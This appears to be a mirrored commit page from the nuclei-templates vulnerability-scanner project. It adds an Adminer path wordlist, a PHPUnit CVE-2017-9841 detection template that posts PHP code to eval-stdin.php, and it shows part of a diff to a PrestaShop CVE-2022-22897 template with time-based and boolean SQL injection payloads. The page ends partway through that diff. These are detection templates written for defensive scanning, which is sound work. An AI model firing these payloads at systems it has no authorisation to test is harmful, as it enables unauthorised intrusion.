admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 15:53:33 +08:00
Code Issues Packages Projects Releases Wiki Activity

Added new templates, fixed false positives, and enhanced others

Browse Source 
- NEW: CVE-2022-31101 (PrestaShop vulnerability)
- NEW: CVE-2025-51586 (vulnerability detection)
- NEW: CVE-2017-9841 (PHPUnit RCE)
- NEW: adminer-paths wordlist (728 paths)

- FIXED FP: CVE-2022-22897 (enhanced detection)
- FIXED FP: CVE-2023-27032 (improved matchers)
- FIXED FP: CVE-2023-27847 (refined detection)
- FIXED FP: CVE-2023-30150 (better version matching)

- ENHANCED: PrestaShop admin panel detection
- ENHANCED: phpinfo files exposure detection

Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com>
This commit is contained in:
Prince Chaddha
2025-11-27 10:14:37 +04:00
parent 54910d34ca
commit b065f80c57
10 changed files with 1478 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files

728
helpers/wordlists/adminer-paths.txt
View File

@@ -766,6 +766,734 @@
/adminer-4.8.1-sk.php
/adminer-4.8.1.php
/adminer-4.8.1/
/editor-4.8.2-cs.php
/editor-4.8.2-de.php
/editor-4.8.2-en.php
/editor-4.8.2-mysql-cs.php
/editor-4.8.2-mysql-de.php
/editor-4.8.2-mysql-en.php
/editor-4.8.2-mysql-pl.php
/editor-4.8.2-mysql-sk.php
/editor-4.8.2-mysql.php
/editor-4.8.2-pl.php
/editor-4.8.2-sk.php
/editor-4.8.2.php
/editor-4.8.2/
/adminer-4.8.2-cs.php
/adminer-4.8.2-de.php
/adminer-4.8.2-en.php
/adminer-4.8.2-mysql-cs.php
/adminer-4.8.2-mysql-de.php
/adminer-4.8.2-mysql-en.php
/adminer-4.8.2-mysql-pl.php
/adminer-4.8.2-mysql-sk.php
/adminer-4.8.2-mysql.php
/adminer-4.8.2-pl.php
/adminer-4.8.2-sk.php
/adminer-4.8.2.php
/adminer-4.8.2/
/editor-4.9.0-cs.php
/editor-4.9.0-de.php
/editor-4.9.0-en.php
/editor-4.9.0-mysql-cs.php
/editor-4.9.0-mysql-de.php
/editor-4.9.0-mysql-en.php
/editor-4.9.0-mysql-pl.php
/editor-4.9.0-mysql-sk.php
/editor-4.9.0-mysql.php
/editor-4.9.0-pl.php
/editor-4.9.0-sk.php
/editor-4.9.0.php
/editor-4.9.0/
/adminer-4.9.0-cs.php
/adminer-4.9.0-de.php
/adminer-4.9.0-en.php
/adminer-4.9.0-mysql-cs.php
/adminer-4.9.0-mysql-de.php
/adminer-4.9.0-mysql-en.php
/adminer-4.9.0-mysql-pl.php
/adminer-4.9.0-mysql-sk.php
/adminer-4.9.0-mysql.php
/adminer-4.9.0-pl.php
/adminer-4.9.0-sk.php
/adminer-4.9.0.php
/adminer-4.9.0/
/editor-4.9.1-cs.php
/editor-4.9.1-de.php
/editor-4.9.1-en.php
/editor-4.9.1-mysql-cs.php
/editor-4.9.1-mysql-de.php
/editor-4.9.1-mysql-en.php
/editor-4.9.1-mysql-pl.php
/editor-4.9.1-mysql-sk.php
/editor-4.9.1-mysql.php
/editor-4.9.1-pl.php
/editor-4.9.1-sk.php
/editor-4.9.1.php
/editor-4.9.1/
/adminer-4.9.1-cs.php
/adminer-4.9.1-de.php
/adminer-4.9.1-en.php
/adminer-4.9.1-mysql-cs.php
/adminer-4.9.1-mysql-de.php
/adminer-4.9.1-mysql-en.php
/adminer-4.9.1-mysql-pl.php
/adminer-4.9.1-mysql-sk.php
/adminer-4.9.1-mysql.php
/adminer-4.9.1-pl.php
/adminer-4.9.1-sk.php
/adminer-4.9.1.php
/adminer-4.9.1/
/editor-4.9.2-cs.php
/editor-4.9.2-de.php
/editor-4.9.2-en.php
/editor-4.9.2-mysql-cs.php
/editor-4.9.2-mysql-de.php
/editor-4.9.2-mysql-en.php
/editor-4.9.2-mysql-pl.php
/editor-4.9.2-mysql-sk.php
/editor-4.9.2-mysql.php
/editor-4.9.2-pl.php
/editor-4.9.2-sk.php
/editor-4.9.2.php
/editor-4.9.2/
/adminer-4.9.2-cs.php
/adminer-4.9.2-de.php
/adminer-4.9.2-en.php
/adminer-4.9.2-mysql-cs.php
/adminer-4.9.2-mysql-de.php
/adminer-4.9.2-mysql-en.php
/adminer-4.9.2-mysql-pl.php
/adminer-4.9.2-mysql-sk.php
/adminer-4.9.2-mysql.php
/adminer-4.9.2-pl.php
/adminer-4.9.2-sk.php
/adminer-4.9.2.php
/adminer-4.9.2/
/editor-4.9.3-cs.php
/editor-4.9.3-de.php
/editor-4.9.3-en.php
/editor-4.9.3-mysql-cs.php
/editor-4.9.3-mysql-de.php
/editor-4.9.3-mysql-en.php
/editor-4.9.3-mysql-pl.php
/editor-4.9.3-mysql-sk.php
/editor-4.9.3-mysql.php
/editor-4.9.3-pl.php
/editor-4.9.3-sk.php
/editor-4.9.3.php
/editor-4.9.3/
/adminer-4.9.3-cs.php
/adminer-4.9.3-de.php
/adminer-4.9.3-en.php
/adminer-4.9.3-mysql-cs.php
/adminer-4.9.3-mysql-de.php
/adminer-4.9.3-mysql-en.php
/adminer-4.9.3-mysql-pl.php
/adminer-4.9.3-mysql-sk.php
/adminer-4.9.3-mysql.php
/adminer-4.9.3-pl.php
/adminer-4.9.3-sk.php
/adminer-4.9.3.php
/adminer-4.9.3/
/editor-4.9.4-cs.php
/editor-4.9.4-de.php
/editor-4.9.4-en.php
/editor-4.9.4-mysql-cs.php
/editor-4.9.4-mysql-de.php
/editor-4.9.4-mysql-en.php
/editor-4.9.4-mysql-pl.php
/editor-4.9.4-mysql-sk.php
/editor-4.9.4-mysql.php
/editor-4.9.4-pl.php
/editor-4.9.4-sk.php
/editor-4.9.4.php
/editor-4.9.4/
/adminer-4.9.4-cs.php
/adminer-4.9.4-de.php
/adminer-4.9.4-en.php
/adminer-4.9.4-mysql-cs.php
/adminer-4.9.4-mysql-de.php
/adminer-4.9.4-mysql-en.php
/adminer-4.9.4-mysql-pl.php
/adminer-4.9.4-mysql-sk.php
/adminer-4.9.4-mysql.php
/adminer-4.9.4-pl.php
/adminer-4.9.4-sk.php
/adminer-4.9.4.php
/adminer-4.9.4/
/editor-4.10.0-cs.php
/editor-4.10.0-de.php
/editor-4.10.0-en.php
/editor-4.10.0-mysql-cs.php
/editor-4.10.0-mysql-de.php
/editor-4.10.0-mysql-en.php
/editor-4.10.0-mysql-pl.php
/editor-4.10.0-mysql-sk.php
/editor-4.10.0-mysql.php
/editor-4.10.0-pl.php
/editor-4.10.0-sk.php
/editor-4.10.0.php
/editor-4.10.0/
/adminer-4.10.0-cs.php
/adminer-4.10.0-de.php
/adminer-4.10.0-en.php
/adminer-4.10.0-mysql-cs.php
/adminer-4.10.0-mysql-de.php
/adminer-4.10.0-mysql-en.php
/adminer-4.10.0-mysql-pl.php
/adminer-4.10.0-mysql-sk.php
/adminer-4.10.0-mysql.php
/adminer-4.10.0-pl.php
/adminer-4.10.0-sk.php
/adminer-4.10.0.php
/adminer-4.10.0/
/editor-4.11.0-cs.php
/editor-4.11.0-de.php
/editor-4.11.0-en.php
/editor-4.11.0-mysql-cs.php
/editor-4.11.0-mysql-de.php
/editor-4.11.0-mysql-en.php
/editor-4.11.0-mysql-pl.php
/editor-4.11.0-mysql-sk.php
/editor-4.11.0-mysql.php
/editor-4.11.0-pl.php
/editor-4.11.0-sk.php
/editor-4.11.0.php
/editor-4.11.0/
/adminer-4.11.0-cs.php
/adminer-4.11.0-de.php
/adminer-4.11.0-en.php
/adminer-4.11.0-mysql-cs.php
/adminer-4.11.0-mysql-de.php
/adminer-4.11.0-mysql-en.php
/adminer-4.11.0-mysql-pl.php
/adminer-4.11.0-mysql-sk.php
/adminer-4.11.0-mysql.php
/adminer-4.11.0-pl.php
/adminer-4.11.0-sk.php
/adminer-4.11.0.php
/adminer-4.11.0/
/editor-4.12.0-cs.php
/editor-4.12.0-de.php
/editor-4.12.0-en.php
/editor-4.12.0-mysql-cs.php
/editor-4.12.0-mysql-de.php
/editor-4.12.0-mysql-en.php
/editor-4.12.0-mysql-pl.php
/editor-4.12.0-mysql-sk.php
/editor-4.12.0-mysql.php
/editor-4.12.0-pl.php
/editor-4.12.0-sk.php
/editor-4.12.0.php
/editor-4.12.0/
/adminer-4.12.0-cs.php
/adminer-4.12.0-de.php
/adminer-4.12.0-en.php
/adminer-4.12.0-mysql-cs.php
/adminer-4.12.0-mysql-de.php
/adminer-4.12.0-mysql-en.php
/adminer-4.12.0-mysql-pl.php
/adminer-4.12.0-mysql-sk.php
/adminer-4.12.0-mysql.php
/adminer-4.12.0-pl.php
/adminer-4.12.0-sk.php
/adminer-4.12.0.php
/adminer-4.12.0/
/editor-4.14.0-cs.php
/editor-4.14.0-de.php
/editor-4.14.0-en.php
/editor-4.14.0-mysql-cs.php
/editor-4.14.0-mysql-de.php
/editor-4.14.0-mysql-en.php
/editor-4.14.0-mysql-pl.php
/editor-4.14.0-mysql-sk.php
/editor-4.14.0-mysql.php
/editor-4.14.0-pl.php
/editor-4.14.0-sk.php
/editor-4.14.0.php
/editor-4.14.0/
/adminer-4.14.0-cs.php
/adminer-4.14.0-de.php
/adminer-4.14.0-en.php
/adminer-4.14.0-mysql-cs.php
/adminer-4.14.0-mysql-de.php
/adminer-4.14.0-mysql-en.php
/adminer-4.14.0-mysql-pl.php
/adminer-4.14.0-mysql-sk.php
/adminer-4.14.0-mysql.php
/adminer-4.14.0-pl.php
/adminer-4.14.0-sk.php
/adminer-4.14.0.php
/adminer-4.14.0/
/editor-4.15.0-cs.php
/editor-4.15.0-de.php
/editor-4.15.0-en.php
/editor-4.15.0-mysql-cs.php
/editor-4.15.0-mysql-de.php
/editor-4.15.0-mysql-en.php
/editor-4.15.0-mysql-pl.php
/editor-4.15.0-mysql-sk.php
/editor-4.15.0-mysql.php
/editor-4.15.0-pl.php
/editor-4.15.0-sk.php
/editor-4.15.0.php
/editor-4.15.0/
/adminer-4.15.0-cs.php
/adminer-4.15.0-de.php
/adminer-4.15.0-en.php
/adminer-4.15.0-mysql-cs.php
/adminer-4.15.0-mysql-de.php
/adminer-4.15.0-mysql-en.php
/adminer-4.15.0-mysql-pl.php
/adminer-4.15.0-mysql-sk.php
/adminer-4.15.0-mysql.php
/adminer-4.15.0-pl.php
/adminer-4.15.0-sk.php
/adminer-4.15.0.php
/adminer-4.15.0/
/editor-4.16.0-cs.php
/editor-4.16.0-de.php
/editor-4.16.0-en.php
/editor-4.16.0-mysql-cs.php
/editor-4.16.0-mysql-de.php
/editor-4.16.0-mysql-en.php
/editor-4.16.0-mysql-pl.php
/editor-4.16.0-mysql-sk.php
/editor-4.16.0-mysql.php
/editor-4.16.0-pl.php
/editor-4.16.0-sk.php
/editor-4.16.0.php
/editor-4.16.0/
/adminer-4.16.0-cs.php
/adminer-4.16.0-de.php
/adminer-4.16.0-en.php
/adminer-4.16.0-mysql-cs.php
/adminer-4.16.0-mysql-de.php
/adminer-4.16.0-mysql-en.php
/adminer-4.16.0-mysql-pl.php
/adminer-4.16.0-mysql-sk.php
/adminer-4.16.0-mysql.php
/adminer-4.16.0-pl.php
/adminer-4.16.0-sk.php
/adminer-4.16.0.php
/adminer-4.16.0/
/editor-4.17.0-cs.php
/editor-4.17.0-de.php
/editor-4.17.0-en.php
/editor-4.17.0-mysql-cs.php
/editor-4.17.0-mysql-de.php
/editor-4.17.0-mysql-en.php
/editor-4.17.0-mysql-pl.php
/editor-4.17.0-mysql-sk.php
/editor-4.17.0-mysql.php
/editor-4.17.0-pl.php
/editor-4.17.0-sk.php
/editor-4.17.0.php
/editor-4.17.0/
/adminer-4.17.0-cs.php
/adminer-4.17.0-de.php
/adminer-4.17.0-en.php
/adminer-4.17.0-mysql-cs.php
/adminer-4.17.0-mysql-de.php
/adminer-4.17.0-mysql-en.php
/adminer-4.17.0-mysql-pl.php
/adminer-4.17.0-mysql-sk.php
/adminer-4.17.0-mysql.php
/adminer-4.17.0-pl.php
/adminer-4.17.0-sk.php
/adminer-4.17.0.php
/adminer-4.17.0/
/editor-4.17.1-cs.php
/editor-4.17.1-de.php
/editor-4.17.1-en.php
/editor-4.17.1-mysql-cs.php
/editor-4.17.1-mysql-de.php
/editor-4.17.1-mysql-en.php
/editor-4.17.1-mysql-pl.php
/editor-4.17.1-mysql-sk.php
/editor-4.17.1-mysql.php
/editor-4.17.1-pl.php
/editor-4.17.1-sk.php
/editor-4.17.1.php
/editor-4.17.1/
/adminer-4.17.1-cs.php
/adminer-4.17.1-de.php
/adminer-4.17.1-en.php
/adminer-4.17.1-mysql-cs.php
/adminer-4.17.1-mysql-de.php
/adminer-4.17.1-mysql-en.php
/adminer-4.17.1-mysql-pl.php
/adminer-4.17.1-mysql-sk.php
/adminer-4.17.1-mysql.php
/adminer-4.17.1-pl.php
/adminer-4.17.1-sk.php
/adminer-4.17.1.php
/adminer-4.17.1/
/editor-5.0.0-cs.php
/editor-5.0.0-de.php
/editor-5.0.0-en.php
/editor-5.0.0-mysql-cs.php
/editor-5.0.0-mysql-de.php
/editor-5.0.0-mysql-en.php
/editor-5.0.0-mysql-pl.php
/editor-5.0.0-mysql-sk.php
/editor-5.0.0-mysql.php
/editor-5.0.0-pl.php
/editor-5.0.0-sk.php
/editor-5.0.0.php
/editor-5.0.0/
/adminer-5.0.0-cs.php
/adminer-5.0.0-de.php
/adminer-5.0.0-en.php
/adminer-5.0.0-mysql-cs.php
/adminer-5.0.0-mysql-de.php
/adminer-5.0.0-mysql-en.php
/adminer-5.0.0-mysql-pl.php
/adminer-5.0.0-mysql-sk.php
/adminer-5.0.0-mysql.php
/adminer-5.0.0-pl.php
/adminer-5.0.0-sk.php
/adminer-5.0.0.php
/adminer-5.0.0/
/editor-5.0.1-cs.php
/editor-5.0.1-de.php
/editor-5.0.1-en.php
/editor-5.0.1-mysql-cs.php
/editor-5.0.1-mysql-de.php
/editor-5.0.1-mysql-en.php
/editor-5.0.1-mysql-pl.php
/editor-5.0.1-mysql-sk.php
/editor-5.0.1-mysql.php
/editor-5.0.1-pl.php
/editor-5.0.1-sk.php
/editor-5.0.1.php
/editor-5.0.1/
/adminer-5.0.1-cs.php
/adminer-5.0.1-de.php
/adminer-5.0.1-en.php
/adminer-5.0.1-mysql-cs.php
/adminer-5.0.1-mysql-de.php
/adminer-5.0.1-mysql-en.php
/adminer-5.0.1-mysql-pl.php
/adminer-5.0.1-mysql-sk.php
/adminer-5.0.1-mysql.php
/adminer-5.0.1-pl.php
/adminer-5.0.1-sk.php
/adminer-5.0.1.php
/adminer-5.0.1/
/editor-5.0.2-cs.php
/editor-5.0.2-de.php
/editor-5.0.2-en.php
/editor-5.0.2-mysql-cs.php
/editor-5.0.2-mysql-de.php
/editor-5.0.2-mysql-en.php
/editor-5.0.2-mysql-pl.php
/editor-5.0.2-mysql-sk.php
/editor-5.0.2-mysql.php
/editor-5.0.2-pl.php
/editor-5.0.2-sk.php
/editor-5.0.2.php
/editor-5.0.2/
/adminer-5.0.2-cs.php
/adminer-5.0.2-de.php
/adminer-5.0.2-en.php
/adminer-5.0.2-mysql-cs.php
/adminer-5.0.2-mysql-de.php
/adminer-5.0.2-mysql-en.php
/adminer-5.0.2-mysql-pl.php
/adminer-5.0.2-mysql-sk.php
/adminer-5.0.2-mysql.php
/adminer-5.0.2-pl.php
/adminer-5.0.2-sk.php
/adminer-5.0.2.php
/adminer-5.0.2/
/editor-5.0.3-cs.php
/editor-5.0.3-de.php
/editor-5.0.3-en.php
/editor-5.0.3-mysql-cs.php
/editor-5.0.3-mysql-de.php
/editor-5.0.3-mysql-en.php
/editor-5.0.3-mysql-pl.php
/editor-5.0.3-mysql-sk.php
/editor-5.0.3-mysql.php
/editor-5.0.3-pl.php
/editor-5.0.3-sk.php
/editor-5.0.3.php
/editor-5.0.3/
/adminer-5.0.3-cs.php
/adminer-5.0.3-de.php
/adminer-5.0.3-en.php
/adminer-5.0.3-mysql-cs.php
/adminer-5.0.3-mysql-de.php
/adminer-5.0.3-mysql-en.php
/adminer-5.0.3-mysql-pl.php
/adminer-5.0.3-mysql-sk.php
/adminer-5.0.3-mysql.php
/adminer-5.0.3-pl.php
/adminer-5.0.3-sk.php
/adminer-5.0.3.php
/adminer-5.0.3/
/editor-5.0.4-cs.php
/editor-5.0.4-de.php
/editor-5.0.4-en.php
/editor-5.0.4-mysql-cs.php
/editor-5.0.4-mysql-de.php
/editor-5.0.4-mysql-en.php
/editor-5.0.4-mysql-pl.php
/editor-5.0.4-mysql-sk.php
/editor-5.0.4-mysql.php
/editor-5.0.4-pl.php
/editor-5.0.4-sk.php
/editor-5.0.4.php
/editor-5.0.4/
/adminer-5.0.4-cs.php
/adminer-5.0.4-de.php
/adminer-5.0.4-en.php
/adminer-5.0.4-mysql-cs.php
/adminer-5.0.4-mysql-de.php
/adminer-5.0.4-mysql-en.php
/adminer-5.0.4-mysql-pl.php
/adminer-5.0.4-mysql-sk.php
/adminer-5.0.4-mysql.php
/adminer-5.0.4-pl.php
/adminer-5.0.4-sk.php
/adminer-5.0.4.php
/adminer-5.0.4/
/editor-5.0.5-cs.php
/editor-5.0.5-de.php
/editor-5.0.5-en.php
/editor-5.0.5-mysql-cs.php
/editor-5.0.5-mysql-de.php
/editor-5.0.5-mysql-en.php
/editor-5.0.5-mysql-pl.php
/editor-5.0.5-mysql-sk.php
/editor-5.0.5-mysql.php
/editor-5.0.5-pl.php
/editor-5.0.5-sk.php
/editor-5.0.5.php
/editor-5.0.5/
/adminer-5.0.5-cs.php
/adminer-5.0.5-de.php
/adminer-5.0.5-en.php
/adminer-5.0.5-mysql-cs.php
/adminer-5.0.5-mysql-de.php
/adminer-5.0.5-mysql-en.php
/adminer-5.0.5-mysql-pl.php
/adminer-5.0.5-mysql-sk.php
/adminer-5.0.5-mysql.php
/adminer-5.0.5-pl.php
/adminer-5.0.5-sk.php
/adminer-5.0.5.php
/adminer-5.0.5/
/editor-5.0.6-cs.php
/editor-5.0.6-de.php
/editor-5.0.6-en.php
/editor-5.0.6-mysql-cs.php
/editor-5.0.6-mysql-de.php
/editor-5.0.6-mysql-en.php
/editor-5.0.6-mysql-pl.php
/editor-5.0.6-mysql-sk.php
/editor-5.0.6-mysql.php
/editor-5.0.6-pl.php
/editor-5.0.6-sk.php
/editor-5.0.6.php
/editor-5.0.6/
/adminer-5.0.6-cs.php
/adminer-5.0.6-de.php
/adminer-5.0.6-en.php
/adminer-5.0.6-mysql-cs.php
/adminer-5.0.6-mysql-de.php
/adminer-5.0.6-mysql-en.php
/adminer-5.0.6-mysql-pl.php
/adminer-5.0.6-mysql-sk.php
/adminer-5.0.6-mysql.php
/adminer-5.0.6-pl.php
/adminer-5.0.6-sk.php
/adminer-5.0.6.php
/adminer-5.0.6/
/editor-5.1.0-cs.php
/editor-5.1.0-de.php
/editor-5.1.0-en.php
/editor-5.1.0-mysql-cs.php
/editor-5.1.0-mysql-de.php
/editor-5.1.0-mysql-en.php
/editor-5.1.0-mysql-pl.php
/editor-5.1.0-mysql-sk.php
/editor-5.1.0-mysql.php
/editor-5.1.0-pl.php
/editor-5.1.0-sk.php
/editor-5.1.0.php
/editor-5.1.0/
/adminer-5.1.0-cs.php
/adminer-5.1.0-de.php
/adminer-5.1.0-en.php
/adminer-5.1.0-mysql-cs.php
/adminer-5.1.0-mysql-de.php
/adminer-5.1.0-mysql-en.php
/adminer-5.1.0-mysql-pl.php
/adminer-5.1.0-mysql-sk.php
/adminer-5.1.0-mysql.php
/adminer-5.1.0-pl.php
/adminer-5.1.0-sk.php
/adminer-5.1.0.php
/adminer-5.1.0/
/editor-5.1.1-cs.php
/editor-5.1.1-de.php
/editor-5.1.1-en.php
/editor-5.1.1-mysql-cs.php
/editor-5.1.1-mysql-de.php
/editor-5.1.1-mysql-en.php
/editor-5.1.1-mysql-pl.php
/editor-5.1.1-mysql-sk.php
/editor-5.1.1-mysql.php
/editor-5.1.1-pl.php
/editor-5.1.1-sk.php
/editor-5.1.1.php
/editor-5.1.1/
/adminer-5.1.1-cs.php
/adminer-5.1.1-de.php
/adminer-5.1.1-en.php
/adminer-5.1.1-mysql-cs.php
/adminer-5.1.1-mysql-de.php
/adminer-5.1.1-mysql-en.php
/adminer-5.1.1-mysql-pl.php
/adminer-5.1.1-mysql-sk.php
/adminer-5.1.1-mysql.php
/adminer-5.1.1-pl.php
/adminer-5.1.1-sk.php
/adminer-5.1.1.php
/adminer-5.1.1/
/editor-5.2.0-cs.php
/editor-5.2.0-de.php
/editor-5.2.0-en.php
/editor-5.2.0-mysql-cs.php
/editor-5.2.0-mysql-de.php
/editor-5.2.0-mysql-en.php
/editor-5.2.0-mysql-pl.php
/editor-5.2.0-mysql-sk.php
/editor-5.2.0-mysql.php
/editor-5.2.0-pl.php
/editor-5.2.0-sk.php
/editor-5.2.0.php
/editor-5.2.0/
/adminer-5.2.0-cs.php
/adminer-5.2.0-de.php
/adminer-5.2.0-en.php
/adminer-5.2.0-mysql-cs.php
/adminer-5.2.0-mysql-de.php
/adminer-5.2.0-mysql-en.php
/adminer-5.2.0-mysql-pl.php
/adminer-5.2.0-mysql-sk.php
/adminer-5.2.0-mysql.php
/adminer-5.2.0-pl.php
/adminer-5.2.0-sk.php
/adminer-5.2.0.php
/adminer-5.2.0/
/editor-5.2.1-cs.php
/editor-5.2.1-de.php
/editor-5.2.1-en.php
/editor-5.2.1-mysql-cs.php
/editor-5.2.1-mysql-de.php
/editor-5.2.1-mysql-en.php
/editor-5.2.1-mysql-pl.php
/editor-5.2.1-mysql-sk.php
/editor-5.2.1-mysql.php
/editor-5.2.1-pl.php
/editor-5.2.1-sk.php
/editor-5.2.1.php
/editor-5.2.1/
/adminer-5.2.1-cs.php
/adminer-5.2.1-de.php
/adminer-5.2.1-en.php
/adminer-5.2.1-mysql-cs.php
/adminer-5.2.1-mysql-de.php
/adminer-5.2.1-mysql-en.php
/adminer-5.2.1-mysql-pl.php
/adminer-5.2.1-mysql-sk.php
/adminer-5.2.1-mysql.php
/adminer-5.2.1-pl.php
/adminer-5.2.1-sk.php
/adminer-5.2.1.php
/adminer-5.2.1/
/editor-5.3.0-cs.php
/editor-5.3.0-de.php
/editor-5.3.0-en.php
/editor-5.3.0-mysql-cs.php
/editor-5.3.0-mysql-de.php
/editor-5.3.0-mysql-en.php
/editor-5.3.0-mysql-pl.php
/editor-5.3.0-mysql-sk.php
/editor-5.3.0-mysql.php
/editor-5.3.0-pl.php
/editor-5.3.0-sk.php
/editor-5.3.0.php
/editor-5.3.0/
/adminer-5.3.0-cs.php
/adminer-5.3.0-de.php
/adminer-5.3.0-en.php
/adminer-5.3.0-mysql-cs.php
/adminer-5.3.0-mysql-de.php
/adminer-5.3.0-mysql-en.php
/adminer-5.3.0-mysql-pl.php
/adminer-5.3.0-mysql-sk.php
/adminer-5.3.0-mysql.php
/adminer-5.3.0-pl.php
/adminer-5.3.0-sk.php
/adminer-5.3.0.php
/adminer-5.3.0/
/editor-5.4.0-cs.php
/editor-5.4.0-de.php
/editor-5.4.0-en.php
/editor-5.4.0-mysql-cs.php
/editor-5.4.0-mysql-de.php
/editor-5.4.0-mysql-en.php
/editor-5.4.0-mysql-pl.php
/editor-5.4.0-mysql-sk.php
/editor-5.4.0-mysql.php
/editor-5.4.0-pl.php
/editor-5.4.0-sk.php
/editor-5.4.0.php
/editor-5.4.0/
/adminer-5.4.0-cs.php
/adminer-5.4.0-de.php
/adminer-5.4.0-en.php
/adminer-5.4.0-mysql-cs.php
/adminer-5.4.0-mysql-de.php
/adminer-5.4.0-mysql-en.php
/adminer-5.4.0-mysql-pl.php
/adminer-5.4.0-mysql-sk.php
/adminer-5.4.0-mysql.php
/adminer-5.4.0-pl.php
/adminer-5.4.0-sk.php
/adminer-5.4.0.php
/adminer-5.4.0/
/editor-5.4.1-cs.php
/editor-5.4.1-de.php
/editor-5.4.1-en.php
/editor-5.4.1-mysql-cs.php
/editor-5.4.1-mysql-de.php
/editor-5.4.1-mysql-en.php
/editor-5.4.1-mysql-pl.php
/editor-5.4.1-mysql-sk.php
/editor-5.4.1-mysql.php
/editor-5.4.1-pl.php
/editor-5.4.1-sk.php
/editor-5.4.1.php
/editor-5.4.1/
/adminer-5.4.1-cs.php
/adminer-5.4.1-de.php
/adminer-5.4.1-en.php
/adminer-5.4.1-mysql-cs.php
/adminer-5.4.1-mysql-de.php
/adminer-5.4.1-mysql-en.php
/adminer-5.4.1-mysql-pl.php
/adminer-5.4.1-mysql-sk.php
/adminer-5.4.1-mysql.php
/adminer-5.4.1-pl.php
/adminer-5.4.1-sk.php
/adminer-5.4.1.php
/adminer-5.4.1/
/itlabvietadminer.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer-4.7.7.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer.php

82
http/cves/2017/CVE-2017-9841.yaml Normal file
View File

@@ -0,0 +1,82 @@
id: CVE-2017-9841
info:
name: PHPUnit - Remote Code Execution
author: Random_Robbie,pikpikcu
severity: critical
description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring via Util/PHP/eval-stdin.php , as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
remediation: |
Upgrade to PHPUnit version 5.7.21 or 6.1.6 or later.
reference:
- https://github.com/cyberharsh/Php-unit-CVE-2017-9841
- https://github.com/RandomRobbieBF/phpunit-brute
- https://thephp.cc/articles/phpunit-a-security-risk
- https://twitter.com/sec715/status/1411517028012158976
- https://nvd.nist.gov/vuln/detail/CVE-2017-9841
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-9841
cwe-id: CWE-94
epss-score: 0.94351
epss-percentile: 0.99953
cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*
metadata:
max-request: 6
vendor: phpunit_project
product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project,vkev,vuln
variables:
string: "CVE-2017-9841"
http:
- raw:
- |
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(string)}}'
- type: status
status:
- 200
# digest: 4b0a00483046022100aed42b83f4f1534b3058586eeaadd4586c31200fdd40a0de62aaaca9e9536089022100b109b1c910eb82dc220f4dc7b7bdd15df89dc2fe4a0af996404147c9c2bf9a14:922c64590222798bb761d5b6d8e72950

53
http/cves/2022/CVE-2022-22897.yaml
View File

@@ -19,18 +19,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22897
cwe-id: CWE-89
epss-score: 0.85193
epss-percentile: 0.99308
epss-score: 0.86131
epss-percentile: 0.99358
cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 4
vendor: apollotheme
product: "ap_pagebuilder"
product: ap_pagebuilder
framework: prestashop
shodan-query:
- "http.component:\"Prestashop\""
- http.component:"prestashop"
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev,vuln
http:
@@ -38,6 +36,7 @@ http:
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
@@ -47,8 +46,8 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -56,8 +55,8 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -66,8 +65,25 @@ http:
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
host-redirects: true
max-redirects: 3
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
- |
